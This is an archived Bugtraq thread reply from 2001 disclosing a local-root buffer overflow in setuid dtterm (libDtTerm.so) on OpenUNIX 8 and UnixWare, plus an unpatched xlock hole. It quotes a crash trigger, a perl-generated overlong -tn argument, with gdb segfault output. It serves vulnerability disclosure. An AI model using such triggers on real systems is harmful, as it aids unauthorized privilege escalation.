Bugtraq mailing list archives
Re: OpenUNIX 8 & Unixware possible local root
From: Aycan Irican <aycan () prosoft com tr>
Date: Wed, 03 Oct 2001 20:57:34 +0300
Yes, I read yours...It looks like it's a multiple vendor shared library(libDtTerm.so) problem to me.
Also Caldera must supply a patch for OpenUNIX 8 xlock vulnerability. I sent a mail to "security-alert" a few days ago about xlock vulnerability but they told me that they put an unofficial patch for Unixware 7, OpenUNIX 8 still VULNERABLE (patch is not applicable on OpenUNIX 8). I think this is a serious bug. For example in earlier 1999 I remember, K2 released an exploit for unixware 7 xlock vulnerability and any standard user that can make a little modification get root access on OpenUNIX 8 TODAY (I got root). Hey man, exploit is around 2 years old and it worked.
KF wrote:
This goes along with a mailing from earlier this morning ... I stated thatI was able to make ALL suid / sgid dt* files core dump except the dtmail binary...-KF Aycan Irican wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Another dt series bug... $ uname -a OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5 $ id uid=101(fixxxer) gid=1(other) $ ls -al /usr/dt/bin/dtterm - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03 /usr/dt/bin/dtterm $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'` Warning: Missing charsets in String to FontSet conversion Warning: Missing charsets in String to FontSet conversion Memory fault # /usr/gnu/bin/gdb /usr/dt/bin/dtterm (no debugging symbols found)... (gdb) set args -tn `perl -e 'print "A"x1040'` (gdb) run Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'` (no debugging symbols found)...(no debugging symbols found)... ... .. [New LWP 2] Program received signal SIGSEGV, Segmentation fault. 0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1 [New Thread 1] (gdb)set args -tn `perl -e 'print "A"x1042'` (gdb) run Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'` (no debugging symbols found)...(no debugging symbols found)... [New LWP 2] Program received signal SIGSEGV, Segmentation fault. 0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1 [New Thread 1] (gdb)q self-explained... enjoy... - -- Aycan ]rican Systems Engineer Prosoft Communication Systems Ltd. Resit Galip Cad. 85/2 Gaziosmanpa~a 06700 Ankara Tel:+90-312-446-6616 Fax:+90-312-446-2423 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE7uVaiJZJwgy0AK78RAsbKAJ0Y8YiCi+yagy2ep42v8wfsu+dsFQCdFIUt 5M67ZahjhrfqnvdlMsqE4SM= =CNXa -----END PGP SIGNATURE-----
Current thread:
- OpenUNIX 8 & Unixware possible local root Aycan Irican (Oct 02)
- Message not available
- Re: OpenUNIX 8 & Unixware possible local root Aycan Irican (Oct 03)
- Message not available
- <Possible follow-ups>
- RE: OpenUNIX 8 & Unixware possible local root Cushing, David (Oct 03)
- Re: OpenUNIX 8 & Unixware possible local root Rob Bartlett - CPRE EMEA (Oct 03)
- Re: OpenUNIX 8 & Unixware possible local root KF (Oct 03)
- RE: OpenUNIX 8 & Unixware possible local root Bob Dog (Oct 03)
- RE: OpenUNIX 8 & Unixware possible local root Bob Dog (Oct 03)
- Re: OpenUNIX 8 & Unixware possible local root ARAI Yuu (Oct 04)
- RE: OpenUNIX 8 & Unixware possible local root Lamont Granquist (Oct 04)
- Re: OpenUNIX 8 & Unixware possible local root Scott J (Oct 04)